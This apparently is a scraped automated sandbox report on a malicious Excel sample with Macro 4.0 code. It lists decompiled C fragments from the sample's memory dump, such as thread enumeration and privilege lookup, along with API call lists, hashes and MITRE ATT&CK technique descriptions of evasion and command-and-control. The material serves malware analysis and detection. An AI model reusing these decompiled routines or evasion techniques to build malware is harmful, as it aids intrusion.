GetProcAddress.KERNEL32(00000000,?), ref: 0009DB6A

Strings

l, xrefs: 0009DAC8
d, xrefs: 0009DAB1

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: AddressLibraryLoadProc
String ID: d$l
API String ID: 2574300362-91452987
Opcode ID: e2a66a7f29839d7ee876785f66da9d4f7e3b194f6b603531649ba7ce79ef0c6e
Instruction ID: 6eca26b2e0120264f5b23545452b970cb6935aa484fee8db310441e1e39abbb3
Opcode Fuzzy Hash: e2a66a7f29839d7ee876785f66da9d4f7e3b194f6b603531649ba7ce79ef0c6e
Instruction Fuzzy Hash: CB9119B6D402159BDF109FB4AC82AFE7BB4AF16358F090065FC49B7343E6319A14D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 000A69A0, Relevance: 7.6, APIs: 5, Instructions: 65
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000A69A0(void* __eflags) {
				intOrPtr _v32;
				signed int _v36;
				void* _v44;
				signed char _t13;
				signed int _t16;
				signed int _t19;
				long _t23;
				void* _t24;
				void* _t25;
				void* _t27;

				_t24 = CreateToolhelp32Snapshot(4, 0);
				_v44 = E00099D50(0x647400b0);
				_t23 = GetCurrentProcessId();
				_t13 = E000955C0(Thread32First(_t24,  &_v44), 0);
				_t27 = _t25 + 0xc;
				if((_t13 & 0x00000001) != 0) {
					L6:
					_t19 = 0;
				} else {
					0;
					0;
					while(GetLastError() != 0x12) {
						_t16 = E000955C0(_v32, _t23);
						_t27 = _t27 + 8;
						_t19 =  ~(_t16 & 0x00000001) & _v36;
						if(Thread32Next(_t24,  &_v44) != 0) {
							if(_t19 == 0) {
								continue;
							} else {
							}
						}
						goto L7;
					}
					goto L6;
				}
				L7:
				return _t19;
			}

0x000a69b2
0x000a69c1
0x000a69ca
0x000a69d9
0x000a69de
0x000a69e3
0x000a6a25
0x000a6a25
0x000a69eb
0x000a69eb
0x000a69ef
0x000a69f0
0x000a69ff
0x000a6a04
0x000a6a11
0x000a6a1d
0x000a6a21
0x00000000
0x00000000
0x000a6a23
0x000a6a21
0x00000000
0x000a6a1d
0x00000000
0x000a69f0
0x000a6a27
0x000a6a30

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000A69AD
GetCurrentProcessId.KERNEL32 ref: 000A69C4
Thread32First.KERNEL32(00000000,?), ref: 000A69D1
GetLastError.KERNEL32 ref: 000A69F0
Thread32Next.KERNEL32(00000000,?), ref: 000A6A16

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Thread32$CreateCurrentErrorFirstLastNextProcessSnapshotToolhelp32
String ID:
API String ID: 1709709923-0
Opcode ID: a5d2626746ee28409eea80e0be773af7b85a77519e888a0b7592b8809c3b9075
Instruction ID: 22550d9d978fb53d7757af38329ec937254bd234e22e72e960605e5c38966302
Opcode Fuzzy Hash: a5d2626746ee28409eea80e0be773af7b85a77519e888a0b7592b8809c3b9075
Instruction Fuzzy Hash: 5801F2B29503046BEB117BF4AC96FFF3A7CEF53315F480130FA04A2123E91A990486B2

Uniqueness

Uniqueness Score: -1.00%

Function 00092340, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00092340(char _a4) {
				signed int _v20;
				struct HDC__* _v24;
				signed int _v28;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				struct HWND__* _t32;
				int _t34;
				struct HWND__* _t35;
				signed int _t36;
				signed int _t39;
				int _t42;
				signed int _t48;
				signed int _t49;
				signed int _t54;
				void* _t56;
				signed int _t58;
				int _t59;

				_t1 =  &_a4; // 0x92f73
				_t56 =  *_t1;
				_t34 = _t56 & 0x00000100;
				RegEnumValueW(_t56, _t34, _t34, _t56 & 0xfffffeff, _t34, _t56 & 0xfffffeff, _t56, _t34);
				_t35 = _t34 * _t56;
				_t39 = 0;
				if(_t35 != _t56) {
					_t36 = _t35 | _t56;
					_t32 = _t36 * _t56;
					_t39 = _t36 * _t32 | _t32;
					_t35 = _t32;
				}
				_t54 = _t39 ^ _t56;
				DestroyWindow(_t35);
				_t58 = _t39 * _t54;
				_v20 = _t58;
				_t3 =  &_a4; // 0x92f73
				_t59 =  *_t3;
				_t42 = _t58 - _t59;
				if(_t59 == 0xaec9ea02 && _t35 != 0xaec9ea02) {
					_t48 = _t42 * _t35;
					_t5 = _t54 - 0x513615fe; // -1362499070
					_t49 = _t48 + _t5;
					_t42 = _t48 + 0xaec9ea02;
					_v24 = _t49;
					_t28 = _t54 * _t49;
					_v28 = _t28;
					_t29 = _t28 + 0xc9;
					_t30 = _t29 * _t35;
					_t35 = _t29 * _t35 >> 0x20;
					_v20 = _t30;
				}
				if(_t35 >= _t59 && _t42 != _t59) {
					MoveToEx(_v24, _t59, _t42, _t59);
					return ((_v28 ^ (_t35 + _v20 & 0x000000ff) * 0xffffffe3) << 0x18) + 0x2a000000 >> 0x18;
				}
				return 0;
			}

0x00092349
0x00092349
0x0009234e
0x00092363
0x00092369
0x0009236c
0x00092370
0x00092372
0x00092376
0x0009237e
0x00092381
0x00092381
0x00092385
0x0009238a
0x00092390
0x00092393
0x00092398
0x00092398
0x0009239e
0x000923a6
0x000923b2
0x000923b5
0x000923b5
0x000923bc
0x000923c2
0x000923c5
0x000923c8
0x000923d0
0x000923d2
0x000923d4
0x000923d6
0x000923d6
0x000923e2
0x000923ee
0x00000000
0x00092410
0x00092419

APIs

RegEnumValueW.ADVAPI32(s/,s/,s/,s/,s/,s/,s/,s/,?,00092F73,?,?,?,?,?,0009AE51), ref: 00092363
DestroyWindow.USER32 ref: 0009238A
MoveToEx.GDI32(00000000,s/,00000000,s/), ref: 000923EE

Strings

s/, xrefs: 00092349, 00092398, 0009235B, 0009235C, 0009235D, 0009235E, 0009235F, 00092360, 00092361, 00092362, 00092387, 000923E8, 000923EA

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: DestroyEnumMoveValueWindow
String ID: s/
API String ID: 1329181790-3258355666
Opcode ID: ea71abc9060870624eee78be531de38e292de3fa50a3bda0095037a54bc3101b
Instruction ID: 70ad689ee023e80a6db14eadaef927469d72580a84d77f7cc3ebeba9af05c8b5
Opcode Fuzzy Hash: ea71abc9060870624eee78be531de38e292de3fa50a3bda0095037a54bc3101b
Instruction Fuzzy Hash: CF2129717002396FDB1C8AA98CD65FFBEDDEB88660B05413BF406DB291E5A48D4183E0

Uniqueness

Uniqueness Score: -1.00%

Function 000946E0, Relevance: 6.1, APIs: 4, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000946E0(void* __eax, struct _LUID* _a4, struct HDC__* _a8, long _a12) {
				signed int _v20;
				signed int _t33;
				int _t34;
				signed int _t45;
				struct tagRECT* _t46;
				signed char _t47;
				signed int _t48;
				WCHAR* _t49;
				struct HWND__* _t50;
				signed char _t51;
				signed char _t55;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t62;
				struct _LUID* _t63;
				signed int _t64;
				signed int _t71;
				int _t73;
				signed int _t75;
				signed int _t81;
				signed int _t82;
				struct HDC__* _t83;
				signed int _t84;

				_t73 = _a12;
				_t83 = _a8;
				_t45 = _t83 * 0x59;
				_t46 = _t45 ^ 0x000000fa;
				_t47 = _t46 & (_t45 ^ 0x00000023);
				OffsetRect(_t46, _t73, _t73);
				_t55 = _t47 + 0xbd;
				_t57 = (_t55 ^ _t47) + _t47;
				_t48 = _t55;
				_v20 = _t57;
				_t58 = _t57;
				_t75 = (_t58 + _t83) * _t48;
				if(_t83 != _t73 || _t58 >= _a8) {
					_t84 = _t75;
					_t49 = _t48 + _t84;
					_t83 = _t84 + _t49;
					LookupPrivilegeValueW(_t49, _t83, _a4);
					_t59 = _t83 + _t49;
					_t75 = _t59 | _t49;
					_t33 = _t49;
					_t48 = _t83;
					if(_a4 == 0xd9f29025) {
						goto L3;
					}
				} else {
					_t59 = _v20;
					if(_a4 != 0xd9f29025) {
						L7:
						_v20 = _t59;
						if(_t59 != _a12) {
							L11:
							_t34 = _a4;
							_t50 = _t48 + _t34;
							EndDialog(_t50, _t34);
							_t81 = ((_t75 ^ _t50) << 0x10) + 0x3080000 >> 0x10;
							_t62 = _t81 * _t50;
							_t83 = (_t83 * _t62 << 0x10) + 0x2520000 >> 0x10;
							_t33 = _t50;
							_t48 = _t81;
							L12:
							if(_a8 == _a12) {
								_t82 = _t62;
								_t63 = _a4;
								if(_t63 != _a8 && _t33 != _t63) {
									SetTextColor(_t83, _a12);
									_t48 = _t82 & (_t83 - _a8 ^ _t48 ^ 0x000003be | 0x00001000);
								}
							}
							return _t48;
						}
						_t64 = _t75;
						if(_t64 != _a12 || _t64 == _a4) {
							goto L11;
						} else {
							_t62 = _v20;
							goto L12;
						}
					}
					L3:
					if(_a8 != 0xd9f29025) {
						_t71 = _t59;
						if(_t71 == _a8) {
							_t59 = _t71;
						} else {
							_t33 = (_t75 << 0x10) + 0x1c0000 >> 0x10;
							_t51 = _t48 + _t33;
							_t83 = (_t51 << 0x18) + 0x6b000000 >> 0x18;
							_t59 = _t51 * _t83;
							_t48 = _t59 * 0x6c000000 >> 0x18;
						}
					}
				}
			}

0x000946e7
0x000946ea
0x000946ed
0x000946f4
0x000946fa
0x000946ff
0x00094709
0x00094711
0x00094713
0x00094715
0x00094718
0x00094720
0x00094725
0x00094781
0x00094784
0x00094786
0x00094791
0x0009479a
0x0009479f
0x000947a1
0x000947a3
0x000947ab
0x00000000
0x00000000
0x0009472c
0x00094731
0x0009473a
0x000947ad
0x000947ad
0x000947b6
0x000947ca
0x000947ca
0x000947cd
0x000947d1
0x000947e2
0x000947e7
0x000947f9
0x000947fc
0x000947fe
0x00094800
0x00094806
0x00094808
0x0009480a
0x00094810
0x0009481d
0x00094838
0x00094838
0x00094810
0x00094844
0x00094844
0x000947b8
0x000947be
0x00000000
0x000947c5
0x000947c5
0x00000000
0x000947c5
0x000947be
0x0009473c
0x00094743
0x00094745
0x0009474d
0x00094845
0x00094753
0x0009475d
0x00094760
0x0009476d
0x00094773
0x0009477c
0x0009477c
0x0009474d
0x00094743

APIs

OffsetRect.USER32 ref: 000946FF
LookupPrivilegeValueW.ADVAPI32(00000000,-000B1D33,?), ref: 00094791
EndDialog.USER32 ref: 000947D1
SetTextColor.GDI32(-025D1D33,-03E11D33), ref: 0009481D

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: ColorDialogLookupOffsetPrivilegeRectTextValue
String ID:
API String ID: 2289036324-0
Opcode ID: c28254e91cc9728cd500f66602ef27c31b092bbb0b24000b771ab6631e913eb3
Instruction ID: 9ba050ebae513c17508a059913b242c535c4c40c2c5e30d2476a67e724f3c317
Opcode Fuzzy Hash: c28254e91cc9728cd500f66602ef27c31b092bbb0b24000b771ab6631e913eb3
Instruction Fuzzy Hash: EB411833B005285BDF18CE58CCE0ABFB7EAEB95351B568629F8199B741C634AD46C6C0

Uniqueness

Uniqueness Score: -1.00%

Function 000929D0, Relevance: 6.1, APIs: 4, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000929D0(void* __eax, struct HWND__* _a4) {
				int _v20;
				signed int _t14;
				struct HDC__* _t21;
				signed int _t26;
				signed int _t28;
				long _t29;
				void* _t32;
				struct HWND__* _t33;
				signed int _t37;
				signed int _t38;
				struct HDC__* _t40;
				struct HWND__* _t42;
				signed int _t43;
				void* _t44;
				void** _t46;

				_t33 = _a4;
				_t26 = _t33 + (_t33 & 0x00000004);
				_t40 = _t26 * 0x6e;
				DeleteDC(_t40);
				_t14 = _t33 * _t40 * _t26;
				_t42 = _t40 + _t14 ^ 0x00000191;
				if(_t33 == 0x191 || _t42 != _t33) {
					_t2 = (0x00000191 - _t42 & _t33) + 0x383; // 0x514
					SetWindowPos(_t42, _t33, 0x191, _t33, _t33, _t33, 0x191);
					_t14 = (_t2 | 0x00000383) * 0x383;
				}
				_v20 = _t14;
				_t43 = _t42 * _t14;
				_t4 = _t43 + 0x368; // -711115
				_t28 = _t4 - _t14;
				_t37 = _t28 ^ _t43;
				_t6 = _t43 + 0x368; // -710243
				_t44 = _t37 + _t6;
				ResetEvent(_t44);
				_t29 = _t28 ^ _t44;
				_t38 = _t37 | _t29;
				_t32 = _t38 & _t44;
				_t7 = _t32 + 0x31; // -711066
				_t21 = _t7 * _t44;
				_t46 = (_t21 + _t29) * _t38;
				CreateDIBSection(_t21, _t21, _v20, _t46, _t32, _t29);
				return _t46 * _t32;
			}

0x000929d7
0x000929df
0x000929e1
0x000929e5
0x000929f0
0x000929f5
0x00092a01
0x00092a17
0x00092a1f
0x00092a2b
0x00092a2b
0x00092a31
0x00092a34
0x00092a37
0x00092a3d
0x00092a41
0x00092a43
0x00092a43
0x00092a4b
0x00092a51
0x00092a53
0x00092a57
0x00092a59
0x00092a5c
0x00092a62
0x00092a6f
0x00092a81

APIs

DeleteDC.GDI32(-000ADD33), ref: 000929E5
SetWindowPos.USER32(-000ADD33,00097BEC,00000191,00097BEC,00097BEC,00097BEC,00000191), ref: 00092A1F
ResetEvent.KERNEL32(-000AD663,?,00097BEC,-000B1FA0,-03E11D33,-000B1D33,?,00099287,-000B1D33,?,000977A1,00000001,?,-000B1D33,?,00096A74), ref: 00092A4B
CreateDIBSection.GDI32(-000AD99A,-000AD99A,-000AD9CB,-000AD663,-000AD9CB,-000AD9CB), ref: 00092A6F

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CreateDeleteEventResetSectionWindow
String ID:
API String ID: 201249963-0
Opcode ID: 3409eff8cf9416cd87beb010bacdbf8b4ae8af0e4800778182f601db0a6ec57f
Instruction ID: 56f4f18647e72d7b827c133b4484286b29c65badd572b00d73a90061db79f27f
Opcode Fuzzy Hash: 3409eff8cf9416cd87beb010bacdbf8b4ae8af0e4800778182f601db0a6ec57f
Instruction Fuzzy Hash: 4C11EB73B002247FE7248A5ADC49EDBBA5EE7C9710F060226F949DB150D575AF05C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 000ADA20, Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000ADA20() {
				char _v28;
				void* _t4;

				_t4 = CreateEventW(0, 1, 0, E00097200(0xb05f8,  &_v28));
				if(_t4 != 0) {
					SetEvent(_t4);
					_t4 = CloseHandle(_t4);
				}
				SetLastError(0);
				return _t4;
			}

0x000ada3f
0x000ada47
0x000ada4c
0x000ada53
0x000ada53
0x000ada5b
0x000ada66

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0CD06773,?,-000B1D33,?,000991EB,-000B1D33,?,000977A1,00000001), ref: 000ADA3F
SetEvent.KERNEL32(00000000,?,?,0CD06773,?,-000B1D33,?,000991EB,-000B1D33,?,000977A1,00000001,?,-000B1D33,?,00096A74), ref: 000ADA4C
CloseHandle.KERNEL32(00000000), ref: 000ADA53
SetLastError.KERNEL32(00000000,?,?,0CD06773,?,-000B1D33,?,000991EB,-000B1D33,?,000977A1,00000001,?,-000B1D33,?,00096A74), ref: 000ADA5B

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Event$CloseCreateErrorHandleLast
String ID:
API String ID: 2055590504-0
Opcode ID: f2e908e6812aa9bcd17f4081954baace572480927d5260a5a849c33e9e80e63c
Instruction ID: f02f903d2dd272a4138a7761e4e52e7b7db864338197488a3d1a01538f620e7e
Opcode Fuzzy Hash: f2e908e6812aa9bcd17f4081954baace572480927d5260a5a849c33e9e80e63c
Instruction Fuzzy Hash: 61E04FB2694204ABF65037E46C0AFEB3A7C9B04B42F440161FB0DD9181E6699454C7BA

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report SecuriteInfo.com.Heur.30497.14031

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "SecuriteInfo.com.Heur.30497.xls"

Indicators

Summary

Document Summary

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 145752

General

Macro 4.0 Code

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Function 0097AE40, Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 372
injectionmemorythreadCOMMON

Function 0098DA20, Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Function 0098D770, Relevance: 3.0, APIs: 2, Instructions: 14
COMMON

Function 0098B1B0, Relevance: 1.5, APIs: 1, Instructions: 23
memoryCOMMON

Function 009869A0, Relevance: 7.6, APIs: 5, Instructions: 65
threadprocessCOMMON

Function 0097D830, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 280
libraryloaderCOMMON

Function 00971A00, Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Function 0098DA70, Relevance: .7, Instructions: 746
COMMONCrypto

Function 00985BF0, Relevance: .3, Instructions: 307
COMMONCrypto

Function 00973A30, Relevance: .1, Instructions: 149
COMMONCrypto

Function 00979A60, Relevance: .1, Instructions: 127
COMMONCrypto

Function 00988830, Relevance: .1, Instructions: 113
COMMON

Function 00979C60, Relevance: .1, Instructions: 95
COMMONCrypto

Function 0098CE40, Relevance: .0, Instructions: 36
COMMON

Function 00982EF0, Relevance: .0, Instructions: 2
COMMON

Function 009746E0, Relevance: 6.1, APIs: 4, Instructions: 134
COMMON

Function 009729D0, Relevance: 6.1, APIs: 4, Instructions: 70
COMMON

Function 000A9C90, Relevance: 1.6, APIs: 1, Instructions: 107
COMMON

Function 00091AF0, Relevance: 1.6, APIs: 1, Instructions: 100
filenetworkCOMMON

Function 0009BA60, Relevance: 6.1, APIs: 4, Instructions: 107
registryCOMMON

Function 000ABAD0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188
networkCOMMON

Function 000A1E90, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114
COMMON

Function 0009BCD0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
COMMON

Function 000A8590, Relevance: 4.6, APIs: 3, Instructions: 128
COMMON

Function 0009A5E0, Relevance: 4.6, APIs: 3, Instructions: 100
filememoryCOMMON

Function 0009ABF0, Relevance: 4.6, APIs: 3, Instructions: 59
registryCOMMON

Function 0009E030, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Function 000A4680, Relevance: 3.7, APIs: 2, Instructions: 710
threadCOMMON

Function 000A3BC0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
COMMON

Function 000A5180, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
COMMON

Function 000A58D0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58
threadCOMMON

Function 000A9600, Relevance: 3.1, APIs: 2, Instructions: 93
fileCOMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre